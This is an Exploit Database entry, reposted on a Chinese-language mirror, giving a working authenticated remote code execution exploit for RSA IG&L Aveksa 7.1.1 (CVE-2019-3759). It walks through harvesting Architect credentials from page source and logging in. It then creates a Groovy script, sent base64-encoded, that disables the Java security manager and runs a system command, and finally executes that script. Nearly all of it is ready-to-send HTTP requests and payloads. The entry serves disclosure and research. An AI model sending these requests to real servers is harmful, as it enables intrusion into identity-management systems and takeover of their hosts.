RSA IG&L Aveksa 7.1.1 – Remote Code Execution

• Exploit Database
• 18 阅读

• 作者： Jakub Palaczynski
  日期： 2020-07-06
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/48639/

• # Exploit Title: RSA IG&L Aveksa 7.1.1 - Remote Code Execution
  # Date: 2019-04-16
  # Exploit Author: Jakub Palaczynski, Lukasz Plonka
  # Vendor Homepage: https://www.rsa.com/
  # Version: 7.1.1, prior to P02 
  # CVE : CVE-2019-3759
  
  # (all vulnerable versions can be found at https://www.dell.com/support/security/pl-pl/details/DOC-106943/DSA-2019-134-RSA-Identity-Governance-and-Lifecycle-Product-Security-Update-for-Multiple-Vulnerabi)
  
  Information:
  Authenticated users can bypass authorization and get full access to Workpoint Architect module. This module gives possibility to run Groovy scripts which results in Code Execution.
  
  1. First user needs to learn username and password for Architect (different from Aveksa login). Sample request:
  https://AVEKSA_HOST/aveksa/main?Oid=193783&ReqType=GetPartial&PageID=ChangeRequestJobPageData&WFObjectID=1%3AWPDS&crID=193783&isAjax=false
  search for "<IFRAME" in source of HTML and note username and password
  
  2. Log into Architect. Sample request:
  POST /aveksaWFArchitect/auth/login/ HTTP/1.1
  Host: AVEKSA_HOST
  User-Agent: python
  wp-product-name: wp-architect
  Content-Type: application/json
  X-Requested-With: XMLHttpRequest
  Content-Length: 146
  Cookie: JSESSIONID=session
  Connection: close
  
  {"user":"USERNAME","password":"PASSWORD","dsn":"WPDS","product":{"name":"wp-architect","version":"4.40.16"}}
  
  3. Creating new script that bypasses Java Security Policy and runs "id" system command.
  * "statementText" - contains base64-encoded Groovy code
  * "name" (at the end) - script name that must be unique
  * Save "scriptId" from the response as it is necessary for next request.
  POST /aveksaWFArchitect/scripts/?refresh=true&replace=false&checkSyntax=false&saveWithRollbackVersion=false HTTP/1.1
  Host: AVEKSA_HOST
  User-Agent: python
  wp-product-name: wp-architect
  Content-Type: application/json
  X-Requested-With: XMLHttpRequest
  Content-Length: 733
  Cookie: JSESSIONID=session
  Connection: close
  
  {"statements":[{"scriptLineId":"-26:AUTOGEN","action":"insert","luDate":null,"luId":"","rowVersion":0,"sequence":1,"scriptClassId":17,"sourceName":"LOCAL","scriptId":"","name":"","validationStatus":0,"validationStatusMsg":"","statement":{"statementText":"U3lzdGVtLnNldFNlY3VyaXR5TWFuYWdlcihudWxsKTsKJ2lkJy5leGVjdXRlKCkudGV4dA==","statementJava":{"javaClass":"","ejb":false,"ejbVersion":"","jndiName":"","method":"","methodIsStatic":false,"returns":{"location":"system","name":""},"useInstance":false,"useInstanceObjectName":"","action":"insert"}}}],"scriptId":"-27:AUTOGEN","action":"insert","luDate":null,"luId":"","rowVersion":0,"name":"SCRIPTNAME","scriptTypeId":3,"validationStatus":0,"falseMsg":"","description":"","emitEvents":false,"errorText":"","saveMethod":"Architect"}
  
  4. Running created script:
  * In the response you have result of your command
  PUT /aveksaWFArchitect/scripts/execute/ HTTP/1.1
  Host: AVEKSA_HOST
  User-Agent: python
  wp-product-name: wp-architect
  Content-Type: application/json
  X-Requested-With: XMLHttpRequest
  Content-Length: 58
  Cookie: JSESSIONID=session
  Connection: close
  
  {"id":"SCRIPTID_OF_CREATED_SCRIPT","newTransaction":false,"symbolTable":{}}